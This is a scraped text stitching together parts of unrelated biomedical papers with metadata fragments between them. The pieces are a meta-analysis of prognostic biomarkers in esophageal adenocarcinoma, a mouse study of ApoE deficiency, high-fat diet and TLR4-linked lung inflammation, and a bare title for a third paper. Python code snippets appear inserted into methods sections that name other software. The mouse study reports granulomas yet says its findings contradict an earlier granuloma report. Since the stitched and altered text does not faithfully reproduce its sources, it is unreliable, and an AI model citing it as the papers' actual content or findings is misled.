In this meta-analysis, 1822 (14.2%) resection specimens were evaluated for prognostic biomarker status after patients had received neoadjuvant chemo(radiation)therapy. It should be noted that in specimens of good responders no, or only a few, remaining tumor cells may be found, biasing the prognostic potential of the assessed biomarker. Moreover, if post-neoadjuvant therapy samples are included in biomarker analyses, treatment regimens should be clearly described. It is known that a better response to therapy is attained with neoadjuvant chemoradiation therapy than if patients receive radiation therapy as a single treatment modality. This could further bias the results found. In addition, when extrapolating these results to a predictive setting for the identification of new therapy options, these biomarkers might not have predictive potential in the neoadjuvant setting. Indeed, sensitivity analyses on articles reporting on patients who received neoadjuvant therapy demonstrated the influence of these treatment regimens on the association between biomarker status and survival. The feature 'cell cycle' was significantly associated with worse OS in all patients and, when testing the same biomarkers, no longer harbored this association with survival if solely neoadjuvant-treated EAC was included in the analysis. Since commonly used DNA-damaging chemotherapeutics such as carboplatin and paclitaxel influence the cell cycle, this effect was expected, highlighting the importance of reporting the received treatment regimen. The importance of clear reporting standards for biomarker research and standardization of the detection method used is also demonstrated by the subgroup analyses on HER2. In contrast to the current notion, no association with decreased survival was found when pooling the data of all articles reporting on the prognostic potential of HER2. When exclusively including data on HER2 positivity assessed by means of the gold standard (IHC and, in case of equivocal HER2 expression (Hoffman scoring system 2+), an additional in situ hybridization method), the association with worse OS remained non-significant 5,103. The significant test heterogeneity found in the corresponding hallmark of cancer feature 'proliferation' could at least partly be attributed to the varying detection methods applied. As all of the tests used have a unique sensitivity and specificity, outcomes can be greatly influenced by the method of biomarker assessment. The applied detection method will not only reflect the underlying tumor biology, but also affect the relation of the biomarker with prognostic outcomes and targetability. For example, it has been demonstrated that solely assessing HER2 positivity by amplification of the HER2 gene with an in situ hybridization method does not correlate with the efficacy of HER2-targeted therapy 103. Likewise, different IHC cutoff points for biomarker positivity influence both prognostic and predictive outcomes. As has been demonstrated in this meta-analysis, even for well-known biomarkers such as HER2, which is used in clinical practice, articles use varying definitions of biomarker positivity, thereby limiting comparison of data. Several promising biomarkers in resectable EAC have been identified; however, in order to stratify patients in accordance with their tumor biology, and to develop new targeted anti-cancer treatments, future research is needed. First, standardization of reporting on biomarker research is needed to further identify prognostic biomarkers.
Subsequently, large-scale multicenter randomized-controlled trials should be conducted to validate the clinical applicability of these biomarkers and to evaluate their potential targetability.
To conclude, a wide variety of prognostic proteins and their expression have been studied in EAC treated with curative intent. Despite varying study quality of the published data, promising biomarkers could be identified, including COX-2, PAK-1, p14ARF, PD-L1, MET, LC3B, IGFBP7 and LGR5. The clinical application and targetability of these biomarkers as anti-cancer therapy in operable EAC should be addressed in future research.
Methods
Search strategy. Literature was retrieved using the Medline, Cochrane and Embase databases on the 19th of January 2017 to identify articles published in the last 10 years, with the publication date restricted to the first of January 2007 until the first of January 2017. In addition to MeSH terms, free-text words were added to the search to include all relevant articles that might not have been assigned MeSH terms yet. The full search is available in the supplementary information S5.
Screening and selection of studies. All titles, abstracts and full-text articles were screened independently by two researchers (AC and EAE); discrepancies were resolved by discussion. Articles were selected based on the following criteria: (i) the research population included adenocarcinomas of the esophagus or the gastro-esophageal junction, defined as Siewert class I and II, that could be treated with curative intent; (ii) the article should report biomarker-related overall survival (OS) data, described with hazard ratios (HR), 95% confidence intervals (CI), and p-values. If both EAC and esophageal squamous cell carcinoma (ESC) were studied, the research population should include at least 70% EAC or display separate survival analyses. Reviews, case reports, (meeting) abstracts, phase I studies and articles without full text in English were excluded. When articles reported on the same biomarker(s) investigating an identical patient population, the publication examining the most biomarkers was included. Endnote X7 (Clarivate Analytics, Boston, USA) was used to select and screen the literature.
Data extraction and outcomes. Data extraction was performed by AC and EAE following a predefined protocol and double-checked until consensus was reached. The following data were extracted: first author, publication year, journal, patient population (EAC only, >70% EAC, or EAC and ESC with separate survival analysis), tumor material studied (blood, biopsy, resection specimen or a combination), reported tissue handling, method of biomarker detection, scoring methods and cut-off values used for biomarker positivity, received therapy (yes (including a clear description of the treatment regimen), no, or not reported (NR)), duration of follow-up, and reported confounders in multivariate analyses. Lastly, the primary outcome of this review was extracted: overall survival data of univariate and/or multivariate analyses presented as HR, 95% CI, and p-value. The impact factor (IF) of the journals at the time of publication of the studies was extracted from bioxbio.com/if/.
Study quality assessment.
To assess the quality of the included studies, the REporting recommendations for tumor MARKer prognostic studies (REMARK) criteria for biomarker studies were adapted into a scoring system (Table 3) 11. The adapted scoring criteria were chosen by discussion between AC, EAE, MvO and HvL. The articles could be scored 1 point per item, with a maximum of 7 points. In case of ambiguity or incompleteness, half a point was allocated. A study was defined as being of low quality when ≤3.5 points were assigned. The study quality was assessed by AC and EAE; in case of disagreement, consensus was reached by discussion.
Statistics. The potential of all identified prognostic biomarkers was evaluated by grouping the biomarkers, according to their main function in tumor biology, into the corresponding hallmark of cancer 104. To fit all identified biomarkers, the hallmarks of cancer were adapted, resulting in the following features: angiogenesis, cell adhesion and extra-cellular matrix remodeling, cell cycle, immune, invasion and metastasis, metabolism, proliferation, and self-renewal. Some articles showed data on a cluster of genes; these were assembled in the hallmarks of cancer feature 'multiple'. Due to the heterogeneous scope of action of the biomarkers, we did not perform meta-analysis on papers included in the 'multiple' group. Pooled hazard ratios (HR) and 95% confidence intervals (CI) were derived by random effects meta-analyses performed on each hallmark of cancer feature. HR and 95%CI data of univariate and multivariate analyses were combined in the meta-analysis; data derived from multivariate analysis were used by default, but when absent, univariate values were used. If the data related to absence rather than presence of the biomarker, the HR data were inverted. When identical biomarkers were reported in more than two studies, these duplicate biomarkers were included in subgroup analyses. In order to determine the influence of a low quality score, sensitivity analyses were performed on studies with low study quality on the adapted REMARK criteria scale. Additional sensitivity analyses were conducted on studies showing data on both EAC treated with surgery as a single treatment modality and neoadjuvant-treated EAC. Finally, the most promising biomarker for each hallmark of cancer feature was selected based on the most optimal combination of a high HR and a small 95% CI. Consensus was reached between AC, EAE, MvO and HvL on the selected biomarkers. Publication bias was evaluated by means of a funnel plot on all hallmarks of cancer features. Random effects meta-analyses were performed in Review Manager V5 (The Cochrane Collaboration, Copenhagen, Denmark). Pearson's correlations with linear regression analysis between IF, adapted REMARK quality score, and patient cohort size were performed using GraphPad Prism 6 (GraphPad Software, La Jolla, CA, USA).
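As an illustration of the pooling step, a DerSimonian-Laird random-effects computation on log-transformed hazard ratios might look as follows; this is a schematic re-implementation of what Review Manager computes, not the software actually used in this study.

```python
import numpy as np

def random_effects_pool(hr, ci_low, ci_high):
    """Pool per-study hazard ratios (with 95% CIs) via the
    DerSimonian-Laird random-effects model on the log scale.
    Returns (pooled HR, lower 95% CI, upper 95% CI)."""
    y = np.log(np.asarray(hr))
    se = (np.log(ci_high) - np.log(ci_low)) / (2 * 1.96)  # SE from CI width
    w = 1.0 / se**2                                       # inverse-variance weights
    y_fe = np.sum(w * y) / np.sum(w)                      # fixed-effect estimate
    Q = np.sum(w * (y - y_fe)**2)                         # Cochran's Q
    C = np.sum(w) - np.sum(w**2) / np.sum(w)
    tau2 = max(0.0, (Q - (len(y) - 1)) / C)               # between-study variance
    w_re = 1.0 / (se**2 + tau2)                           # random-effects weights
    y_re = np.sum(w_re * y) / np.sum(w_re)
    se_re = np.sqrt(1.0 / np.sum(w_re))
    return (np.exp(y_re),
            np.exp(y_re - 1.96 * se_re),
            np.exp(y_re + 1.96 * se_re))
```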
Ethics statement. This article does not contain any studies with human or animal subjects performed by any of the authors.

Table 3. The adapted version of the REporting recommendations for tumor MARKer prognostic studies (REMARK) criteria for biomarker studies 11. A study could be allocated one point for each of the seven criteria; in case of ambiguity, half a point was assigned. Sensitivity analyses were performed on studies assigned ≤3.5 points on the adapted REMARK criteria scale.
"year": 2018,
"sha1": "63fba306946488083ede831d15b3c93950046c80",
"oa_license": "CCBY",
"oa_url": "https://www.nature.com/articles/s41598-018-31548-6.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "d80bb549a2b8e8fc9643561c119e573873cc57a7",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Apolipoprotein E deficiency and high-fat diet cooperate to trigger lipidosis and inflammation in the lung via the toll-like receptor 4 pathway
Apolipoprotein E deficiency (ApoE−/−) combined with a high-fat Western-type diet (WD) is known to activate the toll-like receptor 4 (TLR4) pathway and promote atherosclerosis. However, to date, the pathogenic effects of these conditions on the lung have not been extensively studied. Therefore, the present study examined the effects of ApoE−/− and a WD on lung injury and investigated the underlying mechanisms. ApoE−/− and wild-type mice were fed a WD or a normal chow diet for 4, 12 and 24 weeks. Lung inflammation, lung cholesterol content and cytokine profiles in bronchoalveolar lavage fluid (BALF) were determined. TLR4 and its main downstream molecules were analyzed by western blot analysis. In addition, the role of the TLR4 pathway was further validated using TLR4-targeted gene silencing. The results showed that ApoE−/− mice developed lung lipidosis following 12 weeks of receiving a WD, as evidenced by an increased lung cholesterol content. Moreover, dependent on the time period of receiving the diet, those mice exhibited pulmonary inflammation, which was manifested by initial leukocyte recruitment (at 4 weeks), by increased alveolar septal thickness and mean linear intercept as well as elevated production of inflammation mediators (at 12 weeks), and by granuloma formation (at 24 weeks). The expression levels of TLR4, myeloid differentiation primary response 88 (MyD88) and nuclear factor kappa B were markedly upregulated in ApoE−/− WD mice at week 12. However, these effects were ameliorated by shRNA-mediated knockdown of TLR4. By contrast, ApoE−/− ND or wild-type WD mice exhibited low-grade or no inflammation and mild lipidosis. The levels of TLR4 and MyD88 in those mice showed only minor changes. In conclusion, ApoE deficiency acts synergistically with a WD to trigger lung lipidosis and inflammation, at least in part via TLR4 signaling.
Introduction
There is compelling evidence that apolipoprotein E deficiency (ApoE−/−) combined with a high-fat diet (HFD) regulates toll-like receptor 4 (TLR4) expression and promotes atherosclerosis development. Massaro and Massaro (1) reported that ApoE−/− mice displayed reduced alveologenesis as compared with wild-type strain controls, and that ApoE deficiency had an effect on lung pathological changes. Similarly, Naura et al (2) demonstrated that ApoE−/− mice on a high-fat diet displayed lung inflammation. Goldklang et al (3) indicated that ApoE−/− mice on a high-fat Western-type diet (WD) showed emphysema due to TLR4 activation (3). Samokhin et al (4) suggested that ApoE−/− mice on a high-fat diet developed granulomas similar to those observed in human sarcoidosis. Accordingly, reports of the effects of an HFD on lung pathological changes in ApoE−/− mice differ greatly.
Macrophages are important inflammatory cells implicated in the initiation of inflammation, and they have critical roles in the pathogenesis of foam cell formation (5). TLR4 is a key initiator of innate immunity that is able to promote an adaptive immune response. TLR4 recognizes lipopolysaccharide (LPS), resulting in the activation of the myeloid differentiation factor 88 (MyD88)- and toll-interleukin-1 receptor domain-containing adapter inducing interferon-β (TRIF)-dependent downstream signaling pathways. TLR4 signalling has a critical role in the progression of atherosclerosis and lung inflammation (6,7). A previous study by our group revealed that ApoE−/− mice developed pulmonary capillaritis via up-regulation of TLR4 and nuclear factor (NF)-κB (8). However, to date, the role of TLR4
signalling in the pathogenesis of lung lipidosis has not been studied, to the best of our knowledge. The aim of the present study was to determine whether ApoE deletion combined with hypercholesterolemia induces lung inflammation and lipidosis. Furthermore, TLR4 knockdown was employed to investigate whether TLR4 signalling is implicated in those pathological changes.
Materials and methods
Animals and experimental design. All of the procedures and protocols were approved by the Animal Care Committee of Fujian Medical University (Quanzhou, China) and followed the guidelines of the Animal Management Rules of the Chinese Ministry of Health. Eighty 8-week-old male ApoE−/− mice and sixty age- and gender-matched wild-type mice with a C57BL/6 genetic background (B6) were obtained from the Peking University Animal Centre (Beijing, China). In the first group, thirty ApoE−/− and B6 mice were fed a WD (containing 0.25% cholesterol and 15% cocoa butter; MD12032) or a normal chow diet (ND; MD12031; Yangzhou Medicience Ltd, Yangzhou, China) for 4, 12 or 24 weeks, respectively (n=10 in each group). In the second group, the ApoE−/− and wild-type mice were injected with short hairpin TLR4 interference lentivirus (Lv-shTLR4) or empty vector (both from Invitrogen Life Technologies, Paisley, UK) at 1x10^8 transducing units per mouse through the caudal vein (n=10). They were fed the WD for 12 weeks. All of the animals were kept under standardized lighting conditions (12-h light/dark cycle) and temperature (21±1˚C). Mineral water was administered ad libitum. At the end of the experiment, the mice were sacrificed by an overdose of pentobarbital (90 mg/kg; intraperitoneal injection; Huayehuanyu Ltd, Beijing, China). The bronchoalveolar lavage fluid (BALF) was collected, the left lung lobe tissue was collected for histomorphological examination, and the right lung lobe tissue was collected for RNA and protein analysis.
Hematoxylin and eosin (HE) staining for lung pathomorphological changes. The lung tissue was stained with hematoxylin and eosin (HE; Sigma-Aldrich, St. Louis, MO, USA). The mean linear intercept and septal thickness were quantified as described by Wendel et al (9). This assessment was repeated for 10 terminal respiratory units in one random tissue section per mouse. All the images were acquired using a BX51 microscope (Olympus, Center Valley, PA, USA) and analyzed using Image-Pro Plus 6.0 (Media Cybernetics, Inc., Bethesda, MD, USA). The evaluation was performed by two experienced pathologists who were blinded to the treatments that the mice had received, according to methods previously described (10).
Oil red O staining for lipidosis in the lung and quantitation of pulmonary cholesterol content. For assessment of lipidosis, the frozen lung sections were stained with Oil Red O (Sigma-Aldrich). The cholesterol content of the lung tissue was quantified according to Bates et al (11). The free and total cholesterol contents were calculated using a cholesterol standard (Sigma-Aldrich). The cholesteryl ester content was calculated by subtracting the free cholesterol from the total cholesterol for each sample. The cholesterol content was expressed as 'micrograms of lipid per gram of animal'.
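The cholesterol bookkeeping described above reduces to a subtraction and a normalization; a minimal sketch, with hypothetical argument names, is:

```python
def cholesteryl_ester_content(total_chol_ug, free_chol_ug, tissue_g):
    """Cholesteryl ester = total cholesterol - free cholesterol,
    expressed as micrograms of lipid per gram of tissue."""
    return (total_chol_ug - free_chol_ug) / tissue_g
```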
Double immunofluorescent staining for assessment of TLR4 in macrophages. For the localization of TLR4 expression in macrophages, double immunofluorescence staining using the CD68 macrophage marker and anti-TLR4 (all diluted at 1:100; Abcam, Cambridge, UK) was performed on the lung sections. CD68 and TLR4 double-labelled cells were quantified as a fraction of the total cell nuclei in each lung section.
Serum lipid analysis. Fasting serum samples were collected from 20-week-old mice of different genotypes following fasting for 8 h. The total cholesterol (TC), triglycerides (TG), high-density lipoprotein cholesterol (HDL-C) and non-HDL-C were measured as previously described (13) using reagents from Nanjing KeyGen Biotech Co., Ltd. (Nanjing, China).

Lentiviral short hairpin RNA (Lv-shRNA)-mediated TLR4 gene silencing. The shRNA targeting the TLR4 gene (GenBank accession no. NM021297.2) was screened and tested according to the protocol of Zhu et al (14). The target sequence was designed and chemically synthesized by the United Gene Company (Shanghai, China). This shRNA comprises an RNA duplex containing a sense strand, 5'-GATCCGCACTCTTGATTGCAGTTTCATTCAAGAGATGAAACTGCAATCAAGAGTGCTTTTTTG-3', and an antisense strand, 5'-AATTCAAAAAAGCACTCTTGATTGCAGTTTCATCTCTTGAATGAAACTGCAATCAAGAGTGCG-3'. The inserted TLR4 cDNA sequence was confirmed by DNA sequencing.
Reverse transcription quantitative polymerase chain reaction (RT-qPCR). qPCR was performed to test the efficacy of TLR4 knockdown. Total RNA was isolated from the lung tissue using the RNAiso Plus kit (Takara Biotechnology Co., Ltd., Dalian, China). A total of 500 ng RNA was used as the template for cDNA generation with the RNA RT kit (Takara Bio, Inc., Shiga, Japan). cDNA was immediately reverse-transcribed from the isolated RNA, and subsequently qPCR was performed using Power SYBR Green PCR Master Mix (Takara Bio, Inc.) on the Master Mix System (Roche, Basel, Switzerland). The primer sequences (5' to 3') were: TLR4 forward, ATGGCATGGCTTACACCACC and reverse, GAGGCCAATTTTGTCTCCACA; GAPDH forward, AGGTCGGTGTGAACGGATTTG and reverse, TGTAGACCATGTAGTTGAGGTCA. The PCR conditions were as follows: initial denaturation at 95˚C for 5 min, denaturation at 94˚C for 45 sec, annealing at 50˚C for 1 min and extension at 72˚C for 1 min. The PCR was performed for 35 cycles, followed by a final extension step at 72˚C for 10 min. The PCR product was quantitatively analyzed with LabWorks 4.5 analysis software (UVP LLC, Upland, CA, USA). Relative quantification of the target gene mRNA was performed using the comparative ΔΔCT method, normalized to GAPDH and a relevant ApoE−/− empty-vector control, to obtain 2^−ΔΔCT.
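For illustration, the comparative 2^−ΔΔCT calculation described above can be written as a short function; the argument names are hypothetical, and the calibrator corresponds to the ApoE−/− empty-vector control group.

```python
def fold_change_ddct(ct_target, ct_gapdh, ct_target_ctrl, ct_gapdh_ctrl):
    """Comparative ddCt method: normalize the target gene (e.g., TLR4)
    to GAPDH, then to the calibrator sample; returns the fold change."""
    dct_sample = ct_target - ct_gapdh              # dCt of the sample of interest
    dct_control = ct_target_ctrl - ct_gapdh_ctrl   # dCt of the calibrator
    return 2.0 ** (-(dct_sample - dct_control))    # 2^-ddCt
```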
Statistical analysis. All values are expressed as the mean ± standard error unless otherwise indicated. Group comparisons were performed using Student's t-test (two-sample test) or analysis of variance. A P-value of less than 0.05 was regarded as indicating a statistically significant difference between values. The statistical analysis was performed using SPSS 17.0 software (SPSS, Chicago, IL, USA).
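A minimal sketch of the group-comparison logic (Student's t-test for two groups, one-way ANOVA otherwise, α = 0.05) might look as follows; SciPy is used here purely for illustration, as the authors performed the analysis in SPSS.

```python
from scipy import stats

def compare_groups(*groups, alpha=0.05):
    """Two groups -> independent-samples t-test; more -> one-way ANOVA.
    Returns the test statistic, the p-value and a significance flag."""
    if len(groups) == 2:
        stat, p = stats.ttest_ind(groups[0], groups[1])
    else:
        stat, p = stats.f_oneway(*groups)
    return stat, p, p < alpha
```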
Results

Age-dependent inflammation and lipidosis in the lungs of ApoE−/− WD mice.
In the ApoE−/− mice receiving the WD for four weeks, inflammatory cell infiltration was noted around the capillaries and venules (Fig. 1A). Following the WD for 12 weeks, the ApoE−/− mice showed thickened alveolar septa, exudate-filled alveolar spaces, ruptured septa and bullae formation (Fig. 1B). Widely distributed granulomas were observed in the ApoE−/− mice following the WD for 24 weeks (Fig. 1C). By contrast, among the animals receiving ND treatment for 4 or 12 weeks, the ApoE−/− mice displayed a minimal number of inflammatory cells in the peribronchiolar and perivascular sites (Fig. 1D and E), and very few granulomas developed at 24 weeks of ND (Fig. 1F). Those manifestations were absent in the ApoE−/− mice fed an ND for four weeks or in the wild-type mice fed a WD for 24 weeks (Fig. 1G-L). Collectively, these data suggested that pulmonary inflammation developed more extensively and earlier in the ApoE−/− WD mice than in the littermates on the ND. In the wild-type mice on the WD, no signs of inflammation were observed, as indicated by normal bronchioles and alveoli.
Lipid-laden cells were observed by oil red O staining in the septa and alveolar lumina of the ApoE−/− WD mice at 12 weeks (Fig. 1N), whereas only scattered lipid-filled cells were observed in the ApoE−/− WD mice at 4 and 24 weeks (Fig. 1M and O) and in the ApoE−/− ND littermates at 24 weeks. No foam cells were present in the wild-type mice on the WD, even at 24 weeks (Fig. 1S-U).
Additionally, at 12 weeks, the alveolar septal thickness and mean linear intercept were markedly greater in the ApoE−/− WD mice when compared with those in the ApoE−/− ND or B6 WD mice. The ApoE−/− ND mice showed a marginal increase in alveolar septal thickness and mean linear intercept, albeit without statistical significance. The B6 WD mice exhibited normal alveoli and septal thickness.
Quantitation of the lung cholesterol content showed that at 12 weeks, the total cholesterol content in the lungs of the ApoE−/− WD mice was elevated 5.69-fold relative to that in the B6 WD mice and 4.08-fold compared with that in the ApoE−/− ND mice, predominantly due to a marked elevation in cholesteryl ester levels. In the ApoE−/− WD mice, cholesteryl ester was 29.48-fold higher than that in the B6 WD mice and 6.95-fold higher than that in the ApoE−/− ND mice. In the wild-type B6 mice, the levels of lung cholesterol were altered insignificantly, irrespective of the diet.
Increased TLR4 expression in pulmonary macrophages of ApoE−/− WD mice. TLR4 in macrophages is critical in pulmonary inflammation and lipidosis. To investigate the implications of macrophage TLR4 in the pathogenesis of lung injury, TLR4 expression and lung macrophages were co-localised with double immunofluorescent staining. The CD68+ macrophages (green) in the lung were enriched in TLR4 (red). The ApoE−/− mice fed a WD for 12 weeks exhibited markedly greater macrophage infiltration and TLR4 expression in the alveolar septum compared with that in the B6 WD mice (Fig. 2). The ApoE−/− ND mice displayed a moderately increased number of CD68+TLR4+ cells (yellow) in the lung (Fig. 2).
TLR4 and its downstream activation in ApoE−/− WD mice.
MyD88/NF-κB and TRIF/IRF3 are key downstream molecules in the TLR4 signalling pathway. To determine whether these molecules were involved in pulmonary inflammation and lipidosis, the protein levels of TLR4, as well as its downstream MyD88-dependent (MyD88, NF-κB) and -independent (TRIF and IRF3) molecules, in the lungs were detected by western blot analysis. Following the WD for 12 weeks, the levels of TLR4, MyD88 and p-NF-κB were markedly upregulated in the ApoE−/− mice compared with those in the B6 mice. The TRIF and IRF3 levels were also significantly increased (Fig. 3). Among the mice receiving the ND, the levels of MyD88 and NF-κB in the ApoE−/− mice were moderately elevated relative to those in the corresponding B6 controls; however, the expression levels of TRIF and IRF3 were only marginally altered in the ApoE−/− mice in comparison with those in the B6 animals.
Increased BALF levels of IFN-γ, TNF-α, IL-4, IL-6 and IL-17 in ApoE−/− WD mice. An inflammatory response involves the recruitment of immune cells and changes in cytokines. The levels of IFN-γ, TNF-α, IL-4, IL-6 and IL-17 in BALF were detected in the mice following 12 weeks of receiving their respective diets. In the ApoE−/− mice, the levels of the pro-inflammatory cytokines IFN-γ, TNF-α, IL-6 and IL-17 in BALF were markedly elevated, by 8.7-fold, 9.5-fold, 3.0-fold and 3.8-fold, respectively, compared with those in the littermates on an ND. The anti-inflammatory cytokine IL-4 was significantly increased by 2.7-fold (Fig. 4). The levels of these cytokines were undetectable in the B6 mice receiving the ND or WD.
Hyperlipidemia in the ApoE−/− WD mice. Serum lipids were measured to evaluate the effects of the high-fat Western-type diet on the lipid profiles of the experimental mice. Compared with those of the corresponding genotype mice receiving the ND, the serum TC, TG and non-HDL-C levels were markedly elevated in the ApoE−/− mice receiving the WD and, to a lesser extent, in the wild-type mice following 12 weeks of WD. The HDL-C levels in the ApoE−/− mice decreased, whereas they remained comparable in the wild-type mice (Table I).
Following TLR4-targeted gene silencing, the lung cholesterol content, including the esterified and free cholesterol, was diminished (Fig. 5). The serum lipid profiles changed insignificantly with the TLR4-shRNA lentivirus treatment (data not shown).
Inactivating the MyD88-dependent NF-κB downstream pathway by TLR4 interference. Following TLR4-targeted gene silencing, all of the signalling molecules (MyD88, p-NF-κB, TRIF, IRF3) were downregulated, by 46, 53, 15, and 29%, respectively, with a predominant inhibitory effect on the MyD88-dependent pathway. In the ApoE−/− mice, the levels of these signaling molecules in the lung remained significantly higher than those of the B6 counterparts fed the WD (Fig. 6).
Efficiency and safety of lentivirus transfection in vivo. GFP fluorescence in the lung was still observed at 12 weeks following transfection, which suggested a successful transfection of the shRNA lentivirus (Fig. 7). To further confirm the efficacy of lentivirus-mediated TLR4 gene silencing, the levels of TLR4 mRNA and protein in the lung were determined.

[Figure 2. Double-label immunofluorescence of lung sections with macrophage CD68 (green) and TLR4 (red) markers. The nuclei were stained with DAPI (blue) (magnification, x200). Increased CD68+TLR4+ cells in the ApoE−/− mice fed a WD or ND for 12 weeks. The bars represent the mean ± standard error of seven mice. *P<0.05 compared with the same genotype mice fed the ND for 12 weeks. #P<0.05 compared with the B6 mice fed the same diet. B6, C57BL/6J; TLR4, toll-like receptor 4; ND, normal chow diet; WD, high-fat Western-type diet; Apo, apolipoprotein.]
Compared with the ApoE−/− WD mice, TLR4 mRNA expression in the Lv-sh-TLR4 subgroup was reduced by 64.1%, paralleled by a reduction of TLR4 protein by 49.3%. No adverse effects occurred during the trial, indicating that the lentivirus transfection was safe (data not shown). Collectively, the results demonstrated an efficient and safe lentivirus-mediated transfection of shRNA in vivo.
Discussion
The present study reported that in genetically susceptible ApoE−/− mice, a 12-week high-fat diet induced pulmonary lipidosis, as illustrated by an elevated lung cholesterol content and increased alveolar macrophage foam cell formation. It was discovered that, dependent on the time period of receiving the diet, the ApoE−/− WD mice exhibited inflammatory injury that was characterized by initial leukocyte recruitment (week 4), increased alveolar septal thickness and mean linear intercept (week 12), and granuloma formation (week 24). The ApoE−/− ND mice or wild-type WD mice manifested low-grade or no inflammation. The expression of TLR4 and its downstream molecules MyD88, p-NF-κB, TRIF and IRF3 was markedly upregulated in the ApoE−/− WD mice at 12 weeks, whereas their expression was only slightly changed in the ApoE−/− ND and wild-type WD mice. Blocking the TLR4 pathway was able to ameliorate the lipidosis and inflammation in the ApoE−/− WD mice. To the best of our knowledge, the present study was the first to reveal that an ApoE deficiency combined with a high-fat diet caused lung lipidosis and inflammation via the TLR4 signaling pathway. Of note, it was found that blocking TLR4 could not fully ameliorate the lipidosis and inflammation, suggesting that other signaling pathway(s) may be involved in those pathomorphological changes.
Inflammatory response in ApoE−/− WD mice. Evidence has indicated that the respiratory system and cardiovascular system are intricately intertwined (15). It has been well documented that ApoE−/− mice on a high-fat diet developed pulmonary arterial hypertension (16); those on a Paigen diet exhibited more severe pulmonary hypertension (17). An ApoE mimetic peptide was able to prevent airway inflammation and goblet cell hyperplasia in ApoE−/− mice challenged by house dust mites (18). The present study indicated that the ApoE−/− WD mice developed lung inflammation, which was characterized by initial inflammatory cell infiltration, resultant lipid phagocytosis and exudation, and ultimately, proliferation. The findings of the present study are partially substantiated by a study reporting that ApoE−/− mice on a WD for 10 weeks developed inflammation and emphysema (3). However, the results of the present study contradicted those reported by Samokhin et al (4), who claimed that ApoE−/− mice on a high-fat diet developed granulomas. These conflicting results may be partly explained by differences in the lipid content of the diet and the duration of the high-fat diet. The wild-type mice on the WD exhibited hypercholesterolemia and hypertriglyceridemia with no evidence of lung inflammation and lipidosis. Gene-diet interaction effects were possibly involved in this outcome (19). In the wild-type mice, the lipotoxicity induced by the WD resulted in microinflammation only. However, the ApoE-deficient mice treated with the same diet exhibited obvious inflammatory injury, suggesting that lipotoxicity or ApoE deletion alone is not sufficient to induce inflammatory injury.

[Figure: Expression of TLR4 and its major downstream molecules in lung tissue as determined by western blotting following 12 weeks of WD or ND. β-actin or NF-κB served as the loading control. The bars represent the mean ± standard error of four separate experiments. *P<0.05 compared with mice of the same genotype fed the ND. #P<0.05 compared with the B6 mice fed the same diet. TLR4, toll-like receptor 4; ND, normal chow diet; WD, high-fat Western-type diet; MyD88, myeloid differentiation protein 88; NF-κB, nuclear factor-kappa B; p-NF-κB, phosphorylated NF-κB; TRIF, TIR-domain-containing adapter-inducing interferon-β; IRF3, interferon regulatory factor 3; Apo, apolipoprotein.]
Pulmonary lipidosis in the ApoE−/− WD mice. The primary function of ApoE is to facilitate lipid transport into cells by receptor-mediated endocytosis via the low-density lipoprotein receptor. Adenosine triphosphate-binding cassette transporter A1 (ABCA1) mediates the efflux of cholesterol to lipid-poor apolipoproteins (ApoA1 and ApoE) (20). It was reported that ABCA1−/− mice displayed lung cholesterol accumulation and inflammation (21). The results of the present study revealed that lung lipidosis occurred in the ApoE−/− mice receiving the WD for 12 weeks. Lipid-laden macrophages were scarce in the ApoE−/− WD mice at 24 weeks, which indicated that the interaction between the genetic and non-genetic factors occurred only at critical periods.
TLR4 and activation of downstream molecules in ApoE−/− WD mice. TLR4 downstream signalling comprises at least two distinct pathways: the MyD88-dependent activation of the NF-κB pathway, which leads to the production of inflammatory cytokines, and a MyD88-independent pathway associated with the production of interferon-β and the maturation of dendritic cells. The results of the present study showed that TLR4 signalling activated the MyD88/NF-κB and the TRIF/IRF3 pathways to elicit lung inflammation and lipidosis in the ApoE−/− WD mice. It was indicated that MyD88 and p-NF-κB were elevated in the wild-type mice fed a WD, which was partially consistent with a study reporting that a high-fat diet led to the upregulation of TLR4 and NF-κB expression in the intestines of wild-type mice (23). The present study demonstrated that ApoE deficiency in combination with a WD induces lipidosis and chronic inflammation in the lungs through the TLR4 pathway. There is evidence for a correlation between respiratory and cardiovascular diseases (24); however, the precise mechanisms underlying this co-morbidity have remained elusive, and research on the correlation between the two disorders is in its early stages. It is well documented that TLR4 signalling has an important role in atherosclerosis (25). The findings of the present study illustrated that TLR4 signalling may be a common pathway that contributes to lung injury and atherosclerosis, which may provide valuable information for elucidating lung-heart cross-talk. However, the evidence provided in the present study is limited, and future studies on the gene silencing of MyD88 may be required to more convincingly validate the involvement of TLR4 downstream signaling in the WD-induced lung pathology in the absence of ApoE. Due to the complexity of the mechanisms of gene-environment interaction (26), the neuroendocrine system, changes in gene methylation patterns and the roles of other TLRs in the animal model used in the present study, further investigation is warranted.

[Figure 7. Efficiency of lentivirus transfection assessed by monitoring GFP fluorescence and TLR4 mRNA and protein expression in the lung 12 weeks following lentivirus injection. Arrows indicate GFP+ cells. Original magnification, x400. For TLR4 mRNA expression, the comparative threshold cycle method was used to analyze gene expression normalized to GAPDH by polymerase chain reaction analysis. TLR4 protein expression was quantitated by western blotting. Bars represent the mean ± standard error of triplicate values. *P<0.05 vs. control. GFP, green fluorescent protein; sh-TLR4, short hairpin toll-like receptor 4-targeted gene silencing; Apo, apolipoprotein.]

[Figure 6. Effects of TLR4 interference on (A) MyD88 and p-NF-κB, and (B) TRIF and IRF3 expression in the lungs of mice following 12 weeks of a high-fat Western-type diet, as determined by western blotting. β-actin or total NF-κB served as a loading control. Bars represent the mean ± standard error of three independent experiments with similar results. *P<0.05 compared with ApoE−/− empty vector mice. #P<0.05 compared with wild-type mice. MyD88, myeloid differentiation protein 88; NF-κB, nuclear factor-kappa B; p-NF-κB, phosphorylated NF-κB; TRIF, TIR-domain-containing adapter-inducing interferon-β; IRF3, interferon regulatory factor 3; Apo, apolipoprotein.]
"year": 2015,
"sha1": "7bc7c4f1ff3bc64df9c2a6d5dca24c6beef96e73",
"oa_license": "CCBY",
"oa_url": "https://www.spandidos-publications.com/10.3892/mmr.2015.3774/download",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "7bc7c4f1ff3bc64df9c2a6d5dca24c6beef96e73",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
The beneficial effects of Ganoderma lucidum on cardiovascular and metabolic disease risk
Abstract

